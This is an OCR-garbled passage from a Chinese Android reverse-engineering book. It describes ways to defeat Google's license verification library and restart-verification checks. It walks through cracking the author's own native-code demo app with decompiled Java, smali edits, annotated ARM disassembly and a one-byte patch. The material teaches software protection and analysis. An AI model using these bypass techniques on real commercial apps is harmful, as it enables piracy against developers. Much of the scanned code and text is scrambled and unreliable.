从 上 面 的 分 析 中 可 以 看 出 ，LicenseChecker 的 设计 十 分 重要 。 如 果 
LicenseChecker 只 是 通过 Policy 的 返回 结果 来 判断 软件 的 购买 状态 ， 那 破解 
起 来 就 非常 简单 了 。 只 需 让 allowAccess(0) 方 法 永远 返回 为 真 即 可 破解 掉 软 件 
的 验证 过 程 。 但 如 果 加 入 了 联网 验证 检查 License， 或 其 它 的 验证 方式 ， 那 
么 破解 起 来 就 稍 难 些 了 ， 可 能 需要 阅读 软件 作者 的 具体 实现 代码 来 采取 相 
应 的 措施 。 

综合 上 面 的 讲解 ， 笔 者 在 此 提出 两 种 破解 思路 : 

1. 信息 模拟 法 。LVL 是 如 何 判断 哪 台 手机 是 否 已 经 购买 了 某 程序 的 
WE? 从 图 9-8 中 我 们 可 以 得 知 ，LVL 验 证 服务 器 上 为 每 个 收费 应 用 都 记录 了 
一 份 列表 ， 这 份 列表 记录 了 哪些 用 户 已 经 购买 了 该 应 用 ， 而 用 来 区 分 这 些 
用 户 的 信息 是 靠 设 备 ID 来 完成 的 。 因 此 ， 破 解 人 员 可 以 修改 软件 中 获取 设 
备 ID 的 代码 为 一 个 已 经 购买 了 该 软件 的 设备 ID， 这 样 ， 软 件 本 地 检测 购买 
状态 失败 后 就 会 用 此 设备 ID 去 验证 购买 状态 ， 这 样 就 会 从 服务 器 上 返回 已 
经 购买 的 信息 ， 从 而 达到 通过 验证 的 目的 。 这 种 方法 能 够 成 功 的 前 提 条 件 
是 需要 知道 一 个 已 经 购买 了 该 软件 的 设备 ID ， 但 通常 这 是 比较 困难 的 。 

2. 修改 跳 转 法 。 修 改 Policy 接 口 与 LicenseChecker 接 口 的 返回 值 是 比较 
简单 也 现实 的 方法 ， 前 者 只 需 修改 alowAccess() 方 法 ， 让 其 永远 返回 真 ， 而 
后 者 中 关于 LicenseValidator 验 证 部 分 的 代码 可 以 全 部 无 视 ， 直 接 在 代码 起 始 


处 修改 为 LicenseCheckerCallback 接 口 的 allow0) 方 法 调用 即 可 。 最 后 ， 如 果 想 
更 保险 起 见 ， 可 以 修改 获取 设备 ID 处 的 代码 来 隐藏 使 用 者 的 身份 。 

目前 ， 网 上 已 经 有 人 开发 出 了 自动 破解 LVL 的 工具 AntiLVL。 对 这 块 有 
兴趣 的 读者 可 以 阅读 本 书 配套 源 代 码 中 提供 的 实例 破解 过 程 〈 因 本 节 内 容 
较 敏 感 ， 故 没有 直接 放 到 书 中 ) ， 来 了 解 LVL 的 实际 破解 方法 与 AntiLVL 的 
实现 原理 。 


9.6 ”重启 验证 


重启 验证 是 一 种 常见 的 软件 保护 拷 术 ， 它 的 保护 强度 与 开发 人 员 重 启 
验证 的 保护 思路 有 关 。 


9.6.1 ”重启 验证 保护 思路 


重启 验证 的 通常 做 法 是 : 在 软件 注册 时 不 直接 提示 注册 成 功 与 否 ， 
是 将 注册 信息 保存 下 来 ， 然 后 在 软件 下 次 启动 时 读 取 并 验证 ， 如 果 失 败 则 
软件 仍 未 注册 ， 成 功 则 开启 注册 版 的 功能 。 

Android 系 统 保存 信息 的 方法 有 限 ， 只 能 是 内 部 存储 、 外 部 存储 、 数 据 
库 与 SharedProferences 等 4 种 方式 。 人 破解 者 通常 可 以 在 短 时 间 内 找到 注册 信 
息 的 保存 位 置 ， 因 此 ， 在 实际 使 用 重启 验证 的 过 程 中 ， 注 册 信 息 必 须要 加 
密 存储 才能 保证 其 保护 强度 。 下 面 笔者 给 出 几 种 常见 的 保护 方案 : 

e 单一 保护 。 重 启 验 证 保护 模块 使 用 Java 代 码 编写 ， 注 册 信息 加 密 保 
存 到 内 部 存储 中 。 

e 单一 保护 。 重 启 验 证 保护 模块 使 用 Native 代 码 编写 ， 注 册 信 息 加 密 
保存 到 内 部 存储 中 。 

e 多 重 保护 。 重 启 验 证 保护 模块 使 用 Native 代 码 编写 ， 并 在 代码 中 加 
入 网 络 验证 。 

笔者 给 出 的 方案 中 ， 使 用 Java 代 码 编写 的 重启 验证 保护 是 最 脆弱 的 。 
Java 代 码 由 于 反 编 译 简单 的 原因 ， 破 解 者 能 够 在 短 时 间 内 分 析出 软件 的 重启 


验证 思路 ， 从 而 破解 掉 软 件 。 使 用 Native 代 码 编写 重启 验证 保护 模块 则 相对 
好 一 些 ， 但 需要 注意 的 是 ， 代 码 中 尽量 不 要 使 用 明码 比较 ， 也 不 要 在 软件 
中 只 使 用 一 个 简单 的 条 件 判 断 就 确定 软件 是 否 注册 成 功 ， 而 是 要 在 注册 功 
能 的 代码 中 插入 多 个 验证 点 ， 或 者 插入 一 些 暗 桩 代码 (所 谓 暗 桩 代码 是 指 
在 多 个 功能 代码 点 插入 注册 验证 代码 ， 验 证 失败 就 退出 程序 。 暗 桩 代码 的 
目的 就 是 让 破解 者 找 不 到 验证 点 ) ， 在 发 现 软件 注册 失败 而 被 暴力 破解 的 
情况 下 ， 不 定时 的 退出 程序 或 者 产生 异常 。 最 后 的 多 重 保护 是 最 有 效 的 保 
护 手 法 ， 将 重启 验证 与 网 络 验证 结合 ， 可 以 大 大 增加 软件 的 破解 难度 ， 可 
以 将 软件 的 部 分 功能 代码 加 密 ， 只 有 注册 成 功 后 才能 从 网 络 中 获取 解密 的 
方法 或 解密 因子 ; 也 可 以 每 次 启动 通过 网 络 检查 软件 的 完整 性 ， 或 者 设 定 
软件 有 效 使 用 时 间 等 等 ， 这 些 保 护 思 路 需要 读者 不 断 的 总 结 ， 不 停 地 思 

完善 ， 笔 者 在 此 处 也 只 能 给 出 指导 性 的 建议 。 


9.6.2 ”实例 破解 一 一 针对 重启 验证 方式 的 破解 


为 了 使 本 节 的 实例 不 至 于 看 上 去 像 “ 软 柿子 *"， 轻 易 地 被 破解 掉 ， 在 本 
实例 的 重启 验证 的 保护 模块 笔者 使 用 了 Native 代 码 来 编写 。 运 行 本 小 节 实 例 
Ndkapp， 程 序 启动 后 的 界面 如 图 9-11 所 示 ( 注 : 图 9-9 和 图 9-10 在 本 书 配 套 
源 代码 中 提供 的 实例 破解 过 程 中 ) 。 


zx w! E 8:01 
NDK 保 护 与 重启 验证 演示 程序 -未 注册 


图 9-11 ”重启 验证 演示 程序 


从 标题 中 可 以 看 出 ， 该 软件 现在 处 于 未 注册 的 状态 。 点 击 执行 功能 按 
钮 ， 程 序 弹出 注册 提示 ， 点 击 确定 后 会 跳 转 到 软件 注册 页 面 ， 输 入 注册 码 
后 点 击 注册 按钮 ， 软 件 会 提示 “注册 码 已 保存 ”， 如 图 9-12 所 示 ， 点 击 确 定 按 
钮 后 软件 会 自动 退出 。 
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图 9-12 ”重启 验证 演示 程序 的 注册 页 面 


如 果 注 册 码 输入 错误 ， 软 件 在 启动 时 就 会 注册 失败 ， 从 而 继续 显示 图 9- 
12 所 示 的 效果 。 我 们 现在 的 需求 是 : 找到 该 程序 的 注册 验证 算法 并 计算 出 
注册 码 。 

按照 国际 惯例 ， 先 将 Ndkapp 反 编译 ， 为 了 加 快 分 析 进 度 ， 笔 者 使 用 
dex2jar 将 其 转 成 jir 文 件 来 分 析 。 使 用 jd-gui 打 开 反 编译 后 的 
Ndkapp.apk.dex2jarjar， 定 位 到 MainActivity 的 OnCreate0) 方 法 ， 如 图 9-13 所 
示 ， 程 序 启动 时 读 取 MyApp 类 的 成 员 m， 将 它 的 赋 给 了 i， 通 过 判断 的 值 来 
决定 软件 的 版 本 。 


a Java Decompiler 一 NainÁctivity.class 
File Edit Navigate Search Help 
B eg 

Ndkapp.apk.dex2jar.jar x 


册 android. support. v4 
出 com. droider. ndkapp 
由 四 BuildConfig public void onCreate(Bundle paramBundle) 


MainActivity.class x 


由 - 国 MainActivityfl { 
由 D MainActivity$2 super.onCreateí(paramBundle); 
田 [J] MainActivity$3 setContentView(2130903040) ; 
E- |J] MainActivity Hyàpp localMyàpp = (Myàpp)getàpplication(); 
B- MainActivity int i = Myàpp.u; 
o btnl : Button String strl; 
oS workString : String if (i == 0) 
© doRegister() : void strl = "- 末 注册 ": 
© onCreate(Bundle) : void while (true) 
© onCreateÜptionslenu Menu) ( 
© work(String) : void String str2 = String.value0fl"NDK 保 护 与 重启 验证 这 示 程 序 ") ; 
String str3 = str2 + strl; 
setTitle(str3); 
由 -| Reghctivity$1$1 Button localButtonl = (Button)findViewById(2131165184); 
eghctivityfl this.btnl = localButtonl; 
J) Reghctivity Button localButton2 = this.btnl; 
MainActivity.l locall = new Mainàctivity.l(this):; 
localButton2.setÜünClickListener(locall):; 
return; 
if (i == 1)| 
strl =“- 正 式 版 ": 
else if (i == 2) 
strl = "- 专 业 了 版 ": 
else if (i == 3) 
stel =“- 企 业 版 ": 
else if (i -- 4) 
strl = "-Ẹ ie"; 
else 
strl = "-3k Anfm"; 


Æl9-13 ”MainActivity 的 OnCreate() 方 法 


MyApp 类 为 程序 的 Application 类 ， 在 程序 启动 时 最 先 执行 ， 直 接 修改 成 
员 m 的 值 是 不 是 就 能 破解 掉 程 序 了 呢 ? 而 且 还 可 以 选择 自己 喜欢 的 版 本 。 接 
下 来 动手 试 试 ， 使 用 jd-gui 查 看 MyApp 的 代码 ， 发 现成 员 m 初 始 值 为 0， 我 们 
可 以 将 其 改 为 2 来 让 程序 变 成 专业 版 ， 另 外 ， 注 意 到 MyApp 的 OnCreate() 方 
法 中 调用 了 一 个 Native 的 initSN() 方 法 ， 为 了 防止 该 方法 修改 m 的 值 影响 到 破 
解 效 果 ， 我 们 需要 在 它 的 调用 下 面 为 m 成 员 重 新 赋值 一 次 。 使 用 ApkTool 反 
编译 Ndkapp.apk， 打 开 MyApp.smali， 找 到 关键 位 置 后 插入 赋值 代码 ， 如 图 
9-14 所 示 (注意 : 修改 后 的 方法 使 用 到 了 v0， 需 要 将 .locals 改 为 1) o 


IS C: Xandroid-sdkVworkspaceXWdkappYbinVWdkappYVsmaliXcomVdroiderindkappVyApp.smali 一 Notepad++ 
FO 编辑 区) 搜索 G) WIV 格式 如 语言 C) KEO ZO FTR MFO SD 2 
o B E e lo & DO tx RR) NE z | 0 m D b] |i | lag ^w 
Ez] Mypp. smali 
44  Fj.method public onCreate()V 


.locals 1 


prologue 
.line 19 
invoke-virtual {p0}, Lcom/droider/ndkapp/Myàpp;-»initSN()V 


const/4 v0, Ox2 


sput v0, Lcom/droider/ndkapp/Myàpp:;-»m:I 


.line 21 
invoke-super {p0}, Landroid/app/Aàpplication;-»onCreate()V 


.line 22 
return-void 
.end method 


User Define File - smali length : 1186 lines : 67 Ln : 43 Dolo Se1:0 Dos\Windows 


图 9-14 ”修改 MainActivity.smali 


修改 完成 后 保存 退出 ， 并 使 用 ApkTool 重 新 打包 编译 Ndkapp。 再 次 运行 
程序 ， 标 题 的 确 显 示 为 专业 版 了 ， 可 点 击 执行 功 能 按钮 ， 软 件 会 弹出 提示 
“软件 未 注册 ， 功 能 无 法 使 用 ”， 表 次 点 击 ， 会 弹出 注册 提示 框 ， 如 图 9-15 所 
示 。 


Ni 5554: Android2. 3. 3 


程序 未 注册 


请 点 击 确定 注册 本 程序 或 者 点 击 
取消 退出 程序 ! 


图 9-15 ”修改 后 的 Ndkapp 运 行 界面 
看 来 直接 修改 m 的 值 行 不 通 ， 需 要 继续 分 析 程 序 。 我 们 接 下 来 查看 “ 执 
行 功 能 ”按钮 的 点 击 响 应 类 MainActivity$1 的 代码 。 它 的 OnClick() 方 法 代码 
如 下 : 


public void onClick(View paramView) 


( 


) 


MyApp localMyApp = (MyApp)this.this$0.getApplication(); 
if (MyApp.m == 0) / !lBiMyApp 类 的 m 成 员 值 是 否 为 0 
this.this$0.doRegister(); // 弹 出 注册 提示 框 


while (true) 


{ 


return; 
((MyApp)this.this$0.getApplication()).work();  ”// 调 用 MyApp 类 的 work () 方 法 
Context localContext = this.this$0.getApplicationContext(); 

String str - MainActivity.access$0(); 

Toast.makeText(localContext, str, 0).show(); // 软 件 的 功能 就 是 弹出 不 同 的 
解密 信息 


虽然 上 面 代码 的 逻辑 不 太 准 确 ， 不 过 我 们 还 是 能 了 解 到 : 这 段 代 码 首 
先 判 断 MyApp 类 的 mn 成员 值 是 否 为 0， 如 果 为 0 就 弹出 注册 提示 框 ， 不 为 0 就 
调用 MyApp 类 的 workO0 方 法 。work() 方 法 与 initSNU0 方 法 一 样 ， 同 样 是 Native 
方法 ， 下 面 是 时 候 让 IDA Pro 出 场 了 。 

将 libjuan.so 拖 A IDA Pro 的 主 窗口 ， 待 IDA Pro 分 析 完 后 查找 
com_droider_ndkapp_MyApp_work0O 了 图 数 。 发 现 并 没有 这 个 图 数 ， 原 来 是 
libjuan.so 在 JNL_OnLoad0) 方 法 被 调用 时 注册 了 其 他 的 函数 与 Java 层 的 work0) 
方法 关联 (NI 相关 的 基础 知识 请 读者 参看 书籍 ， 例 如 邓 凡 平 先生 所 著 的 
《深入 理解 Android: 卷 1》 一 书 的 第 2 章 ) 。 定 位 到 JNI_OnLoad0 方 法 ， 其 
反 汇 编 代 码 如 下 : 


:00001338 
:0000133C 
:00001340 
:00001344 


:00001364 


:00001368 
:0000136C 
:00001370 
:00001374 
:00001378 
:0000137C 
:00001380 
:00001384 
:00001388 
:0000138C 
:00001390 
:00001394 
:00001398 
:0000139C 


:000013A0 


:000013A4 
:000013A8 
:000013AC 
:000013B0 
:000013B4 


:000013EC 
:000013F0 
:000013F0 


了 


LDR 
STMFD 
MOV 


LDR 


LDR 
MOV 
ADD 
LDR 
MOV 
LDR 
LDR 
LDR 
MOV 
LDR 
STR 
LDR 
MOV 
LDR 


ADD 


MOV 
MOV 
LDR 
CMP 
BNE 


MOV 
LDMFD 


:00001314 JNI OnLoad 
:00001314 
:00001318 
:0000131C 
:00001320 
:00001324 
:00001328 
:0000132C 
:00001330 
:00001334 


R3, -(g env ptr - 0x1328) 

SP!, (RA4-R6,LR) 

R2, $80x10000 

R5, [PC,R3] ; g env 

R2, R2, #6 

R3, [RO] ” ;RO 寄存 器 保存 的 是 JavaVvM 指 针 

R1, R5 

LR, PC 

PC, [R3,40x18] ;此 处 的 R3 指 向 JNIInvokeInterface 结 构 体 

的 首 地 址 

RO, #0 

loc_1348 

RO, OXFFFFFFFF 

SP!, {R4-R6,PC} 

R3, [R5] ;此 处 的 R3 指 向 JNINativeInterface 结 构 体 的 首 
地 址 

R1, -(aComDroiderNdka - 0x1378) 

RO, R3 

R1, PC, R1 ; "com/droider/ndkapp/MyApp" 

R3, [R3] 

LR, PC 

PC, [R3,#0x18] 

R2, -(native class. ptr - 0x1394) 

R3, [R5] 

R1, RO 

R2, [PC,R2] ; native class 

RO, [R2] 

R2, -(. data start - 0x13A8) 

RO, R3 

R12, [R3] ;此 处 的 R12 指向 JNINativeInterface 结 构 体 的 
首 地 址 

R2, PC, R2 ; , data start ; JNINativeMethod 结 构 体 

数组 

R3, #3 

LR, PC 

PC, [R12,#0x35C] 

RO, #0 

loc. 13D8 

RO, OxFFFFFFFF 

SP!, (RA4-R6,PC] 


End of function JNI, OnLoad 


疯 数 的 开头 与 结尾 为 遂 数 执行 现场 的 保护 与 恢复 ， 详 细 的 分 析 内 容 笔 
者 会 在 本 书 第 12 章 详细 介绍 。 本 小 节 只 分 析 程 序 中 关心 的 部 分 代码 。 注 意 
看 代码 中 加 粗 的 指令 。 发 现 其 中 的 函数 调用 采用 如 下 的 汇编 指令 。 

LDR PC, [R12,1360x35C] 

f£PCS ER 5 ARARIRE LEA EAS EE ERAU AHAT R12 
寄存 器 由 上 面 可 知 是 g_env 保 存 的 全 局 JNIEnv 的 指针 ， 回 忆 本 书 7.6 节 讲述 的 
内 容 ， 该 指针 指向 的 实际 是 JNINativeInterface 结 构 的 首 地 址 。 每 一 个 4 字 节 
的 偏 移 都 存放 着 一 个 遂 数 指针 。 按 照 7.6 小 节 导 入 jni.h 后 ， 会 在 IDA Pro 的 类 
型 库 中 加 入 JNINativeInterface 与 JNIInvokelInterface 的 结构 定义 。 此 时 可 以 在 
IDA Pro 的 Structures 选 项 卡 中 按 下 键盘 的 msert 键 ， 打 开创 建 结 构 体 对 话 框 ， 
然后 点 击 “Add Standard Structure" 打开 结 构 体 选择 框 ， 最 后 将 
JNINativeInterface 导 入 即 可 。 如 果 读 者 没有 按照 7.6 小 节 导 入 jnih 也 没有 关 
系 ， 可 以 点 击 IDA Pro 菜 单项 “File Script file”， 导 入 随 书 光 盘 中 本 小 节 提 供 
的 jni.idc 文 件 ， 同 样 会 在 IDA Pro 的 Structures 选 项 卡 中 添加 JNINativeInterface 
的 结构 定义 。 另 外 ， 注 意 这 段 代 码 中 有 两 条 “LDR PC, [R3,#0x18]” 指 令 ， 前 
者 是 JavaVM 指 针 ， 后 者 是 JNIEnv 指 针 。 

在 “LDR PC, [R12,#0x35C]” 指 令 的 数值 0x35C 上 点 击 右键 ， 然 后 在 弹出 
的 菜单 中 选择 [R12,#JNINativeInterface.RegisterNatives]， 其 他 的 几 处 调用 也 
如 法 炮制 ， 最 终 完 成 后 的 效果 如 下 。 


.text:00001334 LDR PC, [R3,4JNIInvokeInterface.GetEnv] 

.text:00001370 ADD RI, PG, Ri ; "com/droider/ndkapp/MyApp" 

.text:00001374 LDR R3, [R3] 

.text:00001378 MOV LR, PC 

.text:0000137C LDR PC, [R3,8JNINativeInterface.FindClass] 

.text:000013A0 ADD R2, PC, R2 ; | data start ; JNINativeMethod 结 构 体 
数组 

.text:000013A4 MOV R3, 43 

.text:000013A8 MOV LR, PC 

.text:000013AC [R12,4JNINativeInterface.RegisterNatives] 


RegisterNatives 需 要 传 入 一 个 JNINativeMethod 结 构 体 数组 ， 此 处 代码 传 
入 的 是 _data_start 首 地 址 。 双 击 _ data_start 跳 转 到 其 所 在 位 置 。 发 现 数据 如 


Fo 
.data:00004EA4 _ data, start DCD aInitsn ; DATA XREF: JNI_OnLoad+8CîÎ o 
.data:00004EAA ; .text:off 14081[o 
.data:00004EAA4 ; "initSN" 
.data:00004EA8 DCD aV i o y 
.data:00004EAC DCD n1 
.data:00004EBO0 DCD aSavesn ; "SaveSN" 
.data:00004EBA DCD aLjavaLangStrin ; "(Ljava/lang/String;)V" 
.data:00004EB8 DCD n2 
.data:00004EBC DCD aWork : "work" 
.data:00004ECO DCD aV ; MEENT 


.data:00004EC4 DCD n3 

最 后 总 结 得 出 : Native 的 n10 卫 数 对 应 Java 的 initSNO 方 法 ，n20 图 数 对 
应 saveSN(0 方 法 ，n30 国 数 对 应 work0) 方 法 。 了 解 到 这 点 后 ， 直 接 查 看 n30) 因 
数 的 代码 。n30 函 数 首先 调用 了 n10， 然 后 调用 getvValue(0) 来 获取 MyApp 成 员 
m 的 值 ， 接 着 根据 m 的 值 选 择 不 同 的 字符 串 ， 最 后 通过 callWork() 调 用 
com.droider.ndkapp.MainActivity 类 的 work() 方 法 ， 后 者 实际 上 是 设置 字符 串 
成 员 workString 的 值 。m3() 遂 数 的 代码 就 不 列 出 来 了 ， 笔 者 可 以 自己 动手 分 
析 ， 以 提高 Native 代 码 的 分 析 能 力 。 我 们 主要 是 看 n1() 闵 数 的 代码 ， 它 的 主 
要 作用 是 读 取 注册 信息 ， 然 后 进行 注册 信息 的 合法 性 检查 ， 它 的 代码 如 
Fo 


etext: 


.text 


text: 
text: 
text: 
.text: 
:0000153C 


.text 


itext: 
QUexct: 
.text: 
text: 
:00001550 


.text 


,text: 
.text: 
text. 
text: 
:00001564 


.text 


.text: 
.text: 
text: 
text: 
text: 
.text: 
.text: 
.text: 
.text: 
.text: 
Cert 


0000152C n1 
:0000152C 


0000152C 
00001530 
00001534 
00001538 


00001540 
00001544 
00001548 
0000154C 


00001554 
00001558 
0000155C 
00001560 


00001568 
0000156C 
00001570 
00001574 
00001578 
0000157C 
00001580 
00001584 
00001588 
0000158C 
00001590 


; CODE XREF: n3+8|p 

; DATA XREF: .data:00004EAClo 
SP!, (RA-R8,LR) 
R1, -(aR - 0x1544) 


R7, RO 

RO, -(aSdcardReg dat - 0x1548) 

Bi, PG, Rl "rt" 

RO, PC, RO ; "/sdcard/reg.dat" 
fopen ; 打开 /sdcard/reg.dat 文 件 
R5, RO, #0 

return ; 打开 失败 就 返回 

R1, #0 z Off 

R2, #2 ; whence = SEEK_END 
fseek ; 跳 转 到 文件 结尾 

RO, R5 ; stream 

ftell ; 获取 文件 的 大 小 

R6, RO 

RO, RO, WL ; Size 

malloc ; 分 配 内 存 ， 用 来 存放 文件 内 容 
RA, RO, #0 

goclosefile ; 分 配 失败 就 关闭 文件 并 返回 
R1, #0 z XXE 

R2, R1 ; whence - SEEK SET 
Rü, R5 ; stream 

fseek ; 跳 转 到 文件 开头 

R1, R6 ; size 

R2, #1 = m 

IG; RS ; stream 


.text: 
„texti 
text: 
.text: 
.text: 
.text: 
:000015AC MOV 


.text 


.text: 
.text: 
.text: 
.text: 
text: 
.text: 
„text: 
text: 
text: 
.text: 
.text: 
text: 
.text: 
.text: 
.text: 
.text: 
.text: 
.text: 
.text: 
.text: 
.text: 
:00001604 MOV 


.text 


text: 
.text: 
.text: 
.text: 
.text: 
text: 
.text: 
.text: 
.text: 
.text: 


00001594 MOV 
00001598 BL 

0000159C LDR 
000015A0 MOV 
000015A4 STRB 
000015A8 ADD 


000015B0 BL 
000015B4 CMP 
000015B8 BEQ 
000015BC LDR 
000015C0 MOV 
000015C4 ADD 
000015C8 BL 
000015CC CMP 
000015D0 BEQ 
000015D4 LDR 
000015D8 MOV 
000015DC ADD 
000015E0 BL 
000015EA4 CMP 
000015E8 BEQ 
000015EC LDR 
000015F0 MOV 
000015F4 ADD 
000015F8 BL 
000015FC CMP 
00001600 MOVEQ 


00001608 MOVNE 
0000160C BL 
00001610 

00001610 loc_1610 
00001610 

00001610 MOV 
00001614 LDMFD 
00001618 B 
0000161C 

0000161C setValuel 


RO, R4 P ptr 

fread ; 读 取 所 有 文件 内 容 到 分 配 的 内 存 中 

R1, -(a25d55ad283aa40 - 0x15B0) 

R8, #0 

R8, [R4,R6] ; 将 读 取 的 内 容 的 最 后 一 个 字符 设 为 0 

Rl; PC; RI ; "25d55ad283aa400af464c768713c07ad" 
RO, R4 名 ua 

strcmp ; 比较 读 取 的 内 容 

RO, R8 

setValuel 

R1, -(a08e0750210£663 - 0x15CC) 

RO, R4 E mi 

Ri; PC, B1 ; "08e0750210£66396eb83957973705aad" 
strcmp 

RO, #0 

setValue2 

R1, -(aB2db1185c9e5b8 - Ox15E4) 

RO, R4 ; s1 

R1, PC, R1 ; "b2db1185c9e5b8889b70875b3278a4947" 
strcmp 

RO, #0 

setValue3 

R1, -(al18e568777d194c - 0x15FC) 

RO, R4 ; S1 

Ri, PẸ Ri ; "18e568777d194c48589046862801501c" 
strcmp 

RO, #0 

R1, #4 ; setValue4 

RO, R7 

R1, R8 

setValue 


; CODE XREF: nl+FC|j 


; n1+10Cļj 
RO, R5 ; Stream 
SP!, (RA-R8,LR) 
fclose 


; CODE XREF: n1-«8Clj 


. text: 
JEeXE: 
text: 
Obext: 
.text: 
text: 
:te 
.text: 
.text: 
.text: 
text. 
.text: 
.text: 
.text: 
text: 
.text: 
. text: 
. text: 
.text: 
“text: 
«text; 
.text: 
:xt 
‘text: 
texts 
.text: 
.UteXC: 
.Eext: 
.text: 
.text: 
text: 


0000161C 
00001620 
00001624 
00001628 
0000162C 
0000162C 
0000162C 
00001630 
00001634 
00001638 
0000163C 
0000163C 
0000163C 
00001640 
00001644 
00001648 
0000164C 
0000164C 
0000164C 
00001650 
00001654 
00001658 
0000165C 
0000165C 
0000165C 
00001660 
00001664 
00001668 
0000166C 
00001670 
00001670 


MOV RO, R7 

MOV R1, #1 

BL setValue 

B loc 1610 
setValue2 ; 

MOV RO, R7 

MOV R1, #2 

BL setValue 

B loc 1610 
setValue3 g 

MOV RO, R7 

MOV R1, $3 

BL setValue 

B loc 1610 
return : 

MOV RO, R7 

MOV Rl;. R5 

LDMFD SP!, (RA4-R8,LR) 

B setValue 
goclosefile ; 

MOV RO, R5 z 

BL fclose 

MOV RO, R7 

MOV R1, R4 

LDMFD SP!, {R4-R8,LR} 

B setValue 


; End of function n1 


CODE XREF: 


CODE XREF: 


CODE XREF: 


CODE XREF: 


stream 


n1*A4!j 


n1l1+BCÎ j 


nl+201] 


nl+481] 


这 段 代 码 是 一 系列 的 文件 读 写 函数 调用 ， 笔 者 对 其 加 了 详细 的 注释 ， 
有 过 C 语 言 编 程 基础 的 读者 应 该 一 眼 就 能 够 看 明白 具体 的 含义 。 代 码 首先 打 


开 SD 卡 上 的 reg.dat 文 件 ， 如 果 失 败 就 返回 ， 成 功 的 话 就 分 配 一 块 内 存 来 读 
取 它 的 内 容 ， 并 与 几 行 字符 串 进 行 比较 ， 最 后 根据 比较 的 结果 调用 
setValue()EK| 24$ E My A ppPX Gi mB y fio 

到 这 里 ， 程 序 的 验证 思路 算是 弄 明白 了 ， 但 验证 时 这 些 奇怪 的 字符 串 
是 如 何 计 算出 来 的 呢 ? 这 就 要 去 看 saveSNO 对 应 的 n20 国 数 的 代码 了 ， 笔 者 
实际 上 是 调用 C 语 言 版 的 MD5 遂 数 来 加 密 注册 码 ， 分 析 过 程 中 ，IDA Pro 成 
功 的 识别 了 MD5 算 法 中 的 几 个 函数 ， 加 密 后 的 4 个 字符 串 分 别 是 
*12345678". "22345678". “32345678” 与 “42345678” 的 MD5 值 ， 有 兴趣 的 读 
者 可 以 使 用 算法 工具 计算 一 下 。 

现在 可 以 使 用 上 面 4 个 字符 串 中 的 任意 一 个 作为 注册 码 来 进行 注册 了 ， 
不 过 我 们 扩展 下 内 容 ， 来 尝试 破解 一 下 该 程序 。 从 上 面 的 分 析 得 知 ， 破 解 
的 关键 点 可 以 是 n10， 也 可 以 是 n30， 经 过 仔细 考虑 发 现 修改 n10 函 数 更 合 
适 一 些 。n10 函 数 中 有 4 个 字符 串 比较 ， 我 们 可 以 在 比较 时 让 其 直接 跳 转 到 
相应 的 setValueX 标 号 即 可 。 比 较 的 判断 条 件 是 指令 “CMP RO, #0”， 对 应 的 
字 节 码 是 “00 00 50 E3”， 我 们 可 以 将 其 改 为 “<CMP R0, R0” 让 比较 结果 永远 返 
回 真 ， 对 应 的 字 节 码 为 “00 0050 E1”， 笔 者 想 要 使 用 企业 版 功能 ， 只 需要 修 
改 0x15E4 行 的 “00 00 50 E3” 为 “00 00 50 E1”， 实 际 上 只 需要 修改 0x15E7 的 E3 
为 E1， 使 用 C32asm 打 开 libjuan.so 文 件 进行 相应 的 修改 ， 然 后 重新 打包 
Ndkapp 程 序 。 初 次 运行 打包 后 的 程序 ， 会 提示 未 注册 ， 随 便 输入 注册 码 后 
重新 启动 程序 ， 就 会 发 现 程序 已 经 破解 成 功 了 ， 如 图 9-16 所 示 ， 现 在 的 
Ndkapp 已 经 是 企业 版 了 。 


X 国 11:05 
NDK 保 护 与 重启 验证 演示 程序 -专业 版 


感谢 您 购买 企业 版 程序 ! 


图 9-16 ”破解 Ndkapp 程 序 
通过 上 面 的 破解 步骤 我 们 可 以 看 到 ， 使 用 Native 代 码 编写 的 文件 可 以 直 


接 通过 修改 文件 的 内 容 来 达到 破解 的 目的 。 但 如 何 找 到 破解 关键 点 ， 以 及 
如 何 巧妙 的 修改 字 节 码 ， 还 需要 读者 在 实际 的 破解 过 程 中 多 总 结 经 验 。 


9.7 ”如 何 破 解 其 它 类 型 的 Android 程 序 


除了 使 用 Google 官 方 推 荐 的 Java 语 言 与 C/C++ 语言 开发 Android 程 序 外 ， 
还 可 以 使 用 其 它 形形色色 的 语言 来 开发 Android 程 序 。 接 下 来 我 们 看 看 ， 如 
何 破解 其 它 语 言 编写 的 Android 程 序 。 


9.7.1 Mono for Android 开 发 的 程序 及 其 破解 方法 


Mono for Android 可 能 是 用 得 最 多 的 第 三 方 Android 软 件 开发 包 了 ， 它 允 
许 开 发 人 员 使 用 C# 语 言 编 写 Android 程 序 。Mono for Android 的 官方 网 站 
为 : http://xamarin.com/monoforandroid， 开 发 人 员 可 以 在 官网 上 下 载 Mono 
for Android 开 发 环境 的 试用 上 版。 下载 到 单独 的 安装 文件 后 直接 在 系统 中 运 
行 ， 安 装 文件 会 指导 开发 人 员 在 线 安 装 完成 ， 在 安装 过 程 中 ， 开 发 人 员 可 
以 选择 安装 Visual Studio 2010/2012 的 插件 ， 这 样 就 可 以 在 Visual Studio 集 成 
开发 环境 中 开发 Android 程 序 了 ， 如 果 用 户 未 使 用 过 Visual Studio 也 没有 关 
系 ， 可 以 安装 MonoDevelop 作 为 Android 程 序 开 发 环境 。 

一 个 有 趣 的 现象 是 Mono for Android 的 Windows 版 本 安装 文件 名 为 
setup.exe ， 如 果 安 装 前 更 改 setup.exe 为 其 它 名 字 ， 该 程序 会 拒绝 安装 ， 另 
外 ， 安 装 时 setup.exe 会 检测 本 机 是 否 已 经 安装 有 Android SDK， 如 果 没 有 安 
装 则 会 在 线 下 载 安装 ， 但 经 过 笔者 测试 ， 不 管 是 使 用 zip 包 加 系统 变量 的 方 
式 配置 的 Android SDK ， 还 是 下 载 exe 安 装 版 的 Android SDK, ，setup.exe 都 会 
检测 失败 ， 这 意味 着 需要 让 它 从 网 络 上 慢 慢 的 下 载 一 份 Android SDK， 这 着 
实 让 人 很 郁闷 ， 目 前 Mono for Android 的 最 新 版 本 为 4.2， 和 希望 后 期 版 本 会 修 
正 这 个 问题 。 安 装 完 Mono for Android 后 ， 就 可 以 双击 桌面 上 的 
MonoDevelop 图 标 来 启动 开发 环境 了 。 点 击 菜 单项 “文件 > New -> Solution” 
会 弹出 新 建 解决 方案 对 话 框 ， 如 图 9-17 所 示 ，Mono for Android 默 认 提 供 了 6 
种 类 型 的 Android 工 程 。 


oid Library Project 


oid Java Bindings Library 


oid Application 


oid Honeycomb Application 


oid Ice Cream Sandwich Application 


oid ÜpenGL Application 


AmA: 

tao: -— 
